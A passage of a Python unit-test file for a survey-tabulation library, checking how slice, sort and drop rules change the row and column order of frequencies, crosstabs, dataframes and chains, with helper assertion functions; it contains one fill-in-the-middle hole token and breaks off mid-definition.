index_items(col_x, all=False, values=[1, 3, 5, 7, 9, 10, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_y, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## sortx meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col_x, all=False, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 16, 7, 15, 12, 3, 11, 14, 8, 10, 9, 5, 13, 6, 2, 4]), 'iswtd': index_items(col_y, all=False, values=[1, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 13, 6, 2, 4])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## dropx meta['columns'][col_x]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_x, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_y, all=False, values=[1, 3, 5, 7, 9, 11, 13, 15])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## slicex + sortx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[5, 6, 10, 12, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[5, 6, 12, 10, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[16, 15, 12, 14, 8, 10, 9, 7, 11, 13]), 'iswtd': index_items(col_y, all=False, values=[16, 12, 15, 8, 9, 10, 14, 7, 11, 13])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## slicex + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}, 'dropx': {'values': [3, 7, 11, 15]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}, 'dropx': {'values': [2, 6, 10, 14]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[1, 5, 9, 13]), 'iswtd': index_items(col_x, all=False, values=[1, 5, 9, 13])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[4, 8, 12, 16]), 'iswtd': index_items(col_y, all=False, values=[4, 8, 12, 16])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) ################## sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'sortx': 
{'fixed': [4, 7, 3]}, 'dropx': {'values': [5, 10]}}} meta['columns'][col_y]['rules'] = { 'y': { 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [4, 12]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 2, 16, 15, 3, 14, 6, 8, 10, 9, 5, 7, 11, 13]), 'iswtd': index_items(col_y, all=False, values=[1, 2, 16, 3, 15, 8, 9, 10, 14, 5, 6, 7, 11, 13])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) def test_rules_get_chain(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' others = ['q5_1'] xks = [col_x] yks = ['@', col_y] + others test_views = [ 'cbase', 'rbase', # 'ebase', 'counts', 'c%', 'r%', 'mean'] weights = [None, 'weight_a'] ################## slicex + sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [6, 11]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [11, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[5, 10, 12, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[5, 12, 10, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[15, 12, 14, 8, 10, 9, 7, 13]), 'iswtd': index_items(col_y, all=False, values=[12, 15, 8, 9, 10, 14, 7, 13])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) if EXTENDED_TESTS: ################## slicex meta['columns'][col_x]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 10, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[1, 3, 5, 7, 9, 10, 11, 13, 15]), 'iswtd': index_items(col_x, all=False, values=[1, 3, 5, 7, 9, 10, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_y, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## sortx meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col_x, all=False, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 16, 7, 15, 12, 3, 11, 14, 8, 10, 9, 5, 13, 6, 2, 4]), 'iswtd': index_items(col_y, all=False, values=[1, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 13, 6, 2, 4])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## dropx meta['columns'][col_x]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, 
values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_x, all=False, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_y, all=False, values=[1, 3, 5, 7, 9, 11, 13, 15])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## slicex + sortx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[5, 6, 10, 12, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[5, 6, 12, 10, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[16, 15, 12, 14, 8, 10, 9, 7, 11, 13]), 'iswtd': index_items(col_y, all=False, values=[16, 12, 15, 8, 9, 10, 14, 7, 11, 13])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## slicex + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}, 'dropx': {'values': [3, 7, 11, 15]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}, 'dropx': {'values': [2, 6, 10, 14]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[1, 5, 9, 13]), 'iswtd': index_items(col_x, all=False, values=[1, 5, 9, 13])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[4, 8, 12, 16]), 'iswtd': index_items(col_y, all=False, values=[4, 8, 12, 16])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) ################## sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [5, 10]}}} meta['columns'][col_y]['rules'] = { 'y': { 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [4, 12]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[1, 2, 16, 15, 3, 14, 6, 8, 10, 9, 5, 7, 11, 13]), 'iswtd': index_items(col_y, all=False, values=[1, 2, 16, 3, 15, 8, 9, 10, 14, 5, 6, 7, 11, 13])} confirm_xy_chains( self, meta, data, col_x, col_y, others, test_views, weights, rules_values_x, rules_values_y) def test_rules_coltests(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'q5_1' col_y = 'locality' xks = [col_x] yks = ['@', col_y] test_views = [ 'cbase', 'counts', 'mean'] weights = [None] dk = 'test' fk = 'no_filter' xk = col_x yk = col_y stack = get_stack( self, meta, data, xks, yks, test_views, weights, extras=True, coltests=True) ################## slicex ######### counts meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [5, 2, 3]}}} vk = 'x|t.props.askia.01|:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], ['[2]', np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = 
df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### net meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [3, 1, 5]}}} vk = 'x|t.props.askia.10|x[{1,2,3}]:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, '[5]', np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### block net meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [4, 1, 3]}}} vk = 'x|t.props.askia.10|x[{1,2}],x[{2,3}],x[{1,3}]:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN], [np.NaN, '[3, 4]', np.NaN], [np.NaN, '[4]', np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### mean meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [5, 2, 4]}}} vk = 'x|t.means.askia.10|x:|||askia tests' rules_values_df = pd.DataFrame([ ['[2, 4]', np.NaN, '[2]']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ################## sortx ######### counts meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.props.askia.01|:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN, '[5]', np.NaN], [np.NaN, np.NaN, np.NaN, np.NaN, np.NaN], ['[1]', np.NaN, np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN, np.NaN, np.NaN], [np.NaN, '[1, 2]', np.NaN, np.NaN, np.NaN], [np.NaN, '[1]', np.NaN, np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### net meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.props.askia.10|x[{1,2,3}]:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN, '[4, 5]', '[4]']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### block net meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.props.askia.10|x[{1,2}],x[{2,3}],x[{1,3}]:|||askia tests' rules_values_df = pd.DataFrame([ ['[5]', np.NaN, np.NaN, '[2, 5]', np.NaN], [np.NaN, np.NaN, np.NaN, '[3, 4, 5]', '[4, 5]'], [np.NaN, np.NaN, np.NaN, '[4]', np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### mean meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.means.askia.10|x:|||askia tests' rules_values_df = pd.DataFrame([ ['[1]', '[1, 2, 3, 4]', '[1, 2, 3]', np.NaN, '[1]']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ################## dropx ######### counts 
meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [1, 4]}}} vk = 'x|t.props.askia.01|:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN], [np.NaN, np.NaN, '[2]'], [np.NaN, np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### net meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [1, 3]}}} vk = 'x|t.props.askia.10|x[{1,2,3}]:|||askia tests' rules_values_df = pd.DataFrame([ ['[4]', np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### block net meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4]}}} vk = 'x|t.props.askia.10|x[{1,2}],x[{2,3}],x[{1,3}]:|||askia tests' rules_values_df = pd.DataFrame([ ['[5]', '[5]', np.NaN], ['[3, 5]', np.NaN, np.NaN], [np.NaN, np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ######### mean meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [1, 3]}}} vk = 'x|t.means.askia.10|x:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, '[2]', '[2, 4]']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) def test_rules_coltests_flag_bases(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'q5_1' col_y = 'locality' xks = [col_x] yks = ['@', col_y] test_views = [ 'cbase', 'counts', 'mean'] weights = [None] dk = 'test' fk = 'no_filter' xk = col_x yk = col_y minimum = 1000 small = 2000 stack = get_stack( self, meta, data, xks, yks, test_views, weights, extras=True, coltests=True, flag_bases=[minimum, small]) ################## slicex ######### counts meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [5, 2, 3]}}} vk = 'x|t.props.Dim.05|:|||askia tests' rules_values_df = pd.DataFrame([ ['**', np.NaN, '[2]*'], ['**', np.NaN, '*'], ['**', np.NaN, '*'], ['**', np.NaN, '*'], ['**', np.NaN, '*'], ['**', np.NaN, '*'], ['**', np.NaN, '*']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) cbase = 'x|f|x:|||cbase' keys_cbase = [dk, fk, xk, yk, cbase] df_cbase = get_dataframe(stack, keys=keys_cbase, rules=True) is_minimum = [c<=minimum for c in df_cbase.values[0]] is_small = [c>minimum and c<=small for c in df_cbase.values[0]] actual = is_minimum expected = [True, False, False] self.assertSequenceEqual(actual, expected) actual = is_small expected = [False, False, True] self.assertSequenceEqual(actual, expected) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ################## sortx ######### counts meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [1, 2]}}} vk = 'x|t.props.Dim.05|:|||askia tests' rules_values_df = pd.DataFrame([ ['[1, 2]*', '**', '**', np.NaN, np.NaN], ['*', '**', '**', '[2, 3]', np.NaN], ['*', '**', '**', np.NaN, np.NaN], 
['[1]*', '**', '**', np.NaN, '[1]'], ['*', '**', '**', np.NaN, np.NaN], ['*', '**', '**', np.NaN, np.NaN], ['*', '**', '**', np.NaN, np.NaN]]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) cbase = 'x|f|x:|||cbase' keys_cbase = [dk, fk, xk, yk, cbase] df_cbase = get_dataframe(stack, keys=keys_cbase, rules=True) is_minimum = [c<=minimum for c in df_cbase.values[0]] is_small = [c>minimum and c<=small for c in df_cbase.values[0]] actual = is_minimum expected = [False, True, True, False, False] self.assertSequenceEqual(actual, expected) actual = is_small expected = [True, False, False, False, False] self.assertSequenceEqual(actual, expected) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) ################## dropx ######### counts meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [1, 4]}}} vk = 'x|t.props.Dim.05|:|||askia tests' rules_values_df = pd.DataFrame([ [np.NaN, '[2]*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**'], [np.NaN, '*', '**']]) keys = [dk, fk, xk, yk, vk] df = get_dataframe(stack, keys=keys, rules=True) cbase = 'x|f|x:|||cbase' keys_cbase = [dk, fk, xk, yk, cbase] df_cbase = get_dataframe(stack, keys=keys_cbase, rules=True) is_minimum = [c<=minimum for c in df_cbase.values[0]] is_small = [c>minimum and c<=small for c in df_cbase.values[0]] actual = is_minimum expected = [False, False, True] self.assertSequenceEqual(actual, expected) actual = is_small expected = [False, True, False] self.assertSequenceEqual(actual, expected) actual = df.fillna(0).values.tolist() expected = rules_values_df.fillna(0).values.tolist() self.assertSequenceEqual(actual, expected) # ##################### Helper functions ##################### def index_items(col, values, all=False): """ Return a correctly formed list of tuples to matching an index. """ items = [ (col, i) for i in values ] if all: items = [(col, 'All')] + items return items def confirm_frequencies(self, meta, data, weights, col, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. 
""" df = frequency(meta, data, x=col) natural_x = df.index.values.tolist() natural_y = natural_x frequ_x = [(col, '@')] frequ_y = frequ_x for weight in weights: if weight is None: rules_x = rules_values_x['unwtd'] rules_y = rules_values_y['unwtd'] else: rules_x = rules_values_x['iswtd'] rules_y = rules_values_y['iswtd'] # rules=True fx = frequency(meta, data, x=col, weight=weight, rules=True) fy = frequency(meta, data, y=col, weight=weight, rules=True) # print fx # print zip(*rules_x)[1] # print zip(*rules_y)[1] confirm_index_columns(self, fx, rules_x, frequ_x) confirm_index_columns(self, fy, frequ_x, rules_y) # rules=False fx = frequency(meta, data, x=col, weight=weight, rules=False) fy = frequency(meta, data, y=col, weight=weight, rules=False)<|fim▁hole|> confirm_index_columns(self, fx, natural_x, frequ_x) confirm_index_columns(self, fy, frequ_x, natural_y) # rules=x fx = frequency(meta, data, x=col, weight=weight, rules=['x']) fy = frequency(meta, data, y=col, weight=weight, rules=['x']) confirm_index_columns(self, fx, rules_x, frequ_x) confirm_index_columns(self, fy, frequ_x, natural_y) # rules=y fx = frequency(meta, data, x=col, weight=weight, rules=['y']) fy = frequency(meta, data, y=col, weight=weight, rules=['y']) confirm_index_columns(self, fx, natural_x, frequ_x) confirm_index_columns(self, fy, frequ_x, rules_y) # rules=xy fx = frequency(meta, data, x=col, weight=weight, rules=['x', 'y']) fy = frequency(meta, data, y=col, weight=weight, rules=['x', 'y']) confirm_index_columns(self, fx, rules_x, frequ_x) confirm_index_columns(self, fy, frequ_x, rules_y) def confirm_crosstabs(self, meta, data, weights, col_x, col_y, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. """ fx = frequency(meta, data, x=col_x) natural_x = fx.index.values.tolist() fy = frequency(meta, data, y=col_y) natural_y = fy.columns.values.tolist() for weight in weights: if weight is None: rules_x = rules_values_x['unwtd'] rules_y = rules_values_y['unwtd'] else: rules_x = rules_values_x['iswtd'] rules_y = rules_values_y['iswtd'] for xtotal in [False, True]: # rules=True df = crosstab(meta, data, col_x, col_y, weight=weight, rules=True, xtotal=xtotal) confirm_index_columns(self, df, rules_x, rules_y) # print df # print df.index # print df.columns # print zip(*rules_x)[1] # print zip(*rules_y)[1] # rules=False df = crosstab(meta, data, col_x, col_y, weight=weight, rules=False, xtotal=xtotal) confirm_index_columns(self, df, natural_x, natural_y) # rules=x df = crosstab(meta, data, col_x, col_y, weight=weight, rules=['x'], xtotal=xtotal) confirm_index_columns(self, df, rules_x, natural_y) # rules=y df = crosstab(meta, data, col_x, col_y, weight=weight, rules=['y'], xtotal=xtotal) confirm_index_columns(self, df, natural_x, rules_y) # rules=xy df = crosstab(meta, data, col_x, col_y, weight=weight, rules=['x', 'y'], xtotal=xtotal) confirm_index_columns(self, df, rules_x, rules_y) def confirm_get_dataframe(self, stack, col_x, col_y, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. 
""" keys = ['dk', 'fk', 'xk', 'yk', 'vk'] keys[0] = dk = 'test' keys[1] = fk = 'no_filter' keys[2] = xk = col_x keys[3] = yk = col_y meta = stack[dk].meta data = stack[dk].data vks = stack.describe()['view'].values.tolist() for xk in [col_x]: keys[2] = xk for yk in ['@', col_y]: if xk=='@' and yk=='@': continue keys[3] = yk for vk in vks: keys[4] = vk # if 'mean' in vk: # print vk rules_x, natural_x, rules_y, natural_y = get_xy_values( meta, data, col_x, col_y, xk, yk, vk, rules_values_x, rules_values_y ) # rules=True df = get_dataframe(stack, keys=keys, rules=True) # print df # print df.index # print df.columns # print zip(*rules_x)[1] # print zip(*rules_y)[1] confirm_index_columns(self, df, rules_x, rules_y) # rules=False df = get_dataframe(stack, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, natural_y) # rules=x df = get_dataframe(stack, keys=keys, rules=['x']) confirm_index_columns(self, df, rules_x, natural_y) # rules=y df = get_dataframe(stack, keys=keys, rules=['y']) confirm_index_columns(self, df, natural_x, rules_y) # rules=xy df = get_dataframe(stack, keys=keys, rules=['x', 'y']) confirm_index_columns(self, df, rules_x, rules_y) def confirm_xy_chains(self, meta, data, col_x, col_y, others, views, weights, rules_values_x, rules_values_y): stack = get_stack( self, meta, data, [col_x], ['@', col_y] + others, views, weights, extras=True) confirm_get_xchain( self, stack, col_x, col_y, others, rules_values_x, rules_values_y) stack = get_stack( self, meta, data, [col_x] + others, [col_y], views, weights, extras=True) confirm_get_ychain( self, stack, col_x, col_y, others, rules_values_x, rules_values_y) def confirm_get_xchain(self, stack, col_x, col_y, others, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. """ keys = ['dk', 'fk', 'xk', 'yk', 'vk'] keys[0] = dk = 'test' keys[1] = fk = 'no_filter' keys[2] = xk = col_x keys[3] = yk = col_y meta = stack[dk].meta data = stack[dk].data xks = [col_x] yks = ['@', col_y] + others confirm_get_chain( self, meta, data, stack, keys, col_x, col_y, xks, yks, rules_values_x, rules_values_y, others) def confirm_get_ychain(self, stack, col_x, col_y, others, rules_values_x, rules_values_y): """ Confirms all variations of rules applied with frequency. 
""" keys = ['dk', 'fk', 'xk', 'yk', 'vk'] keys[0] = dk = 'test' keys[1] = fk = 'no_filter' keys[2] = xk = col_x keys[3] = yk = col_y meta = stack[dk].meta data = stack[dk].data xks = [col_x] + others yks = [col_y] confirm_get_chain( self, meta, data, stack, keys, col_x, col_y, xks, yks, rules_values_x, rules_values_y, others) def confirm_get_chain(self, meta, data, stack, keys, col_x, col_y, xks, yks, rules_values_x, rules_values_y, others=[]): vks = stack.describe()['view'].values.tolist() weight = None chain_true_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=True, rules_weight=weight) chain_false_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=False, rules_weight=weight) chain_x_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['x'], rules_weight=weight) chain_y_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['y'], rules_weight=weight) chain_xy_unwtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['x', 'y'], rules_weight=weight) weight = 'weight_a' chain_true_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=True, rules_weight=weight) chain_false_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=False, rules_weight=weight) chain_x_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['x'], rules_weight=weight) chain_y_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['y'], rules_weight=weight) chain_xy_wtd = stack.get_chain(x=xks, y=yks, views=vks, rules=['x', 'y'], rules_weight=weight) for xk in xks: keys[2] = xk for yk in yks: if xk=='@' and yk=='@': continue keys[3] = yk for vk in vks: keys[4] = vk for weight in [None, 'weight_a']: # if xk=='q5_1' and yk=='ethnicity' and vk=='x|f|x:|||ebase': # print xk, yk, vk # if vk=='x|f|:y|||rbase' and yk=='q5_1': # print vk rules_x, natural_x, rules_y, natural_y = get_xy_values( meta, data, col_x, col_y, xk, yk, vk, rules_values_x, rules_values_y, others, rules_weight=weight ) # rules=True if weight is None: df = get_dataframe(chain_true_unwtd, keys=keys, rules=False) # print df # print df.index # print df.columns # print zip(*rules_x)[1] # print zip(*rules_y)[1] confirm_index_columns(self, df, rules_x, rules_y) # rules=False df = get_dataframe(chain_false_unwtd, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, natural_y) # rules=x df = get_dataframe(chain_x_unwtd, keys=keys, rules=False) confirm_index_columns(self, df, rules_x, natural_y) # rules=y df = get_dataframe(chain_y_unwtd, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, rules_y) # rules=xy df = get_dataframe(chain_xy_unwtd, keys=keys, rules=False) confirm_index_columns(self, df, rules_x, rules_y) else: df = get_dataframe(chain_true_wtd, keys=keys, rules=False) # print df # print df.index # print df.columns # print zip(*rules_x)[1] # print zip(*rules_y)[1] confirm_index_columns(self, df, rules_x, rules_y) # rules=False df = get_dataframe(chain_false_wtd, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, natural_y) # rules=x df = get_dataframe(chain_x_wtd, keys=keys, rules=False) confirm_index_columns(self, df, rules_x, natural_y) # rules=y df = get_dataframe(chain_y_wtd, keys=keys, rules=False) confirm_index_columns(self, df, natural_x, rules_y) # rules=xy df = get_dataframe(chain_xy_wtd, keys=keys, rules=False) confirm_index_columns(self, df, rules_x, rules_y) def 